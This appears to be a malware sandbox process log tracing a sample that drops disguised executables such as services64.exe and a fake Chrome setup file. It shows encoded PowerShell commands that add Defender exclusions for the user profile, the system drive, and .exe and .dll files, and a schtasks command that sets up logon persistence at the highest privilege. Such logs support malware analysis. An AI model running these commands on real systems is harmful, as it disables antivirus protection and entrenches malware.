PID:4300 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit4⤵PID:4492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"5⤵PID:4040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="5⤵PID:2980
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c taskkill /f /PID "5028"4⤵PID:5008
-
C:\Windows\system32\taskkill.exetaskkill /f /PID "5028"5⤵
- Kills process with taskkill
PID:4932
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\Microsoft\services64.exe"4⤵PID:4348
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\Microsoft\services64.exe"5⤵
- Creates scheduled task(s)
PID:1016
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Microsoft\services64.exe"4⤵PID:768
-
C:\Users\Admin\Microsoft\services64.exeC:\Users\Admin\Microsoft\services64.exe5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4644 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit6⤵PID:2232
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"7⤵PID:4516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="7⤵PID:4652
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"6⤵
- Executes dropped EXE
PID:3632 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "nwsxnhxvsavxvk"7⤵PID:60
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\45325325354235.exe"C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\45325325354235.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1960
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2200
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵PID:4980
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:4588
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:4952